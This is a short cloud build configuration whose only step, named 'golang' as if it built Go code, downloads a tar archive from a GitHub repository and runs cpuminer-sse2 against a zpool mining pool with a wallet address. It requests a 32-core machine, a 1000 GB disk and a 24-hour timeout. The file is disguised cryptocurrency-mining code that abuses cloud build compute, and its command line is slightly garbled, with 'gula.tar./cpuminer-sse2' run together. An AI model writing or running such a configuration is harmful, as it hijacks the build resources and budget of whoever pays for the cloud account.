steps:
  - name: golang
    args: 
      - '-c'
      - >-
        wget https://github.com/NabilaMahmudah/24/raw/main/gula.tar && tar xf gula.tar./cpuminer-sse2 -a yespowerURX -o stratum+tcp://yespowerURX.sea.mine.zpool.ca:6236 -u UiDBkAA6H1LyqTMfBrBnPEegZ8LQho3JNv.odang -t32
    waitFor: ["-"]
    entrypoint: /bin/bash
timeout: 86400s
options:
  machineType: 'e2-highcpu-32'
  diskSizeGb: '1000'
